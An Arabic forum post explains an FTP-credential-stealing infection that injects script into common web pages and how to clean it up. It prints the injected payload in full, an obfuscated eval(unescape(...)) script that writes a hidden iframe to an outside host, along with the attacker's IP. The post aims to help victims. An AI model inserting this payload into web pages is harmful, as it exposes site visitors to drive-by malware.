السلام عليكم ورحمة الله وبركاته
باذن الله سوف اعطيكم ملخص لهذا اللعين لأني تعاملت معه منذ لحظة الاكتشاف مرورا بالتقصي والتتبع انتهائا بالتطهير
اولا الامر ينشأ من فايرس يصيب جهازك وليس من الضروري يكون جهازك فربما تستخدم ال ftp لموقعك انت واشخاص اخرون فربما المصاب هو جهاز احدهم
كيف يعمل ؟
الفايرس يسوي اتصال عبر برنامج ال ftp ثم يرسل بيانات الموقع الى سيده وهو يحمل هذا الاي بي 85.17.230.150 ( ليس بالضرورة ان يظل يستخدم هذا الاي بي مدى الحياة فمن الذكاء تغيير الاي بي باستمرار )
كيفية العلاج
اولا بحظر الاي بي وذلك يتم بالرجوع اولا الى لوق السيرفر ومعرفة اي بي عدونا اللدود
ثانيا هذا الفايروس شديد الدهاء عبقري يصيب اشد اسماء الصفح شهرة وباي امتداد وسوف اعطيكم ملخص باسماء هذه الصفحات
"main,index,default,login,header,footer"
افتح اي ملف يحمل هذا الاسم واحذف منه كود الجافا والذي سوف اكتبه الان لسببين اولهم حتى تقوموا بحذفه الثاني حتى يصل الينا من محركات البحث كل من اصابه هذا اللعين فلطالما بحثت واستغثت بقووقل ولكن لم اجد من يتكلم عن هذا اللعين واعتقد اننا اول موقع يتكلم عنه وقووقل يشهد
كود:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%39%61%30%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%31%31%33%36%29%2b%27%34%39%31%5c%27%20%77%69%64%74%68%3d%33%35%36%20%68%65%69%67%68%74%3d%32%35%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> تحياتي للجميع واسأل الله ان اكون قد وفقت في حل مشاكلكم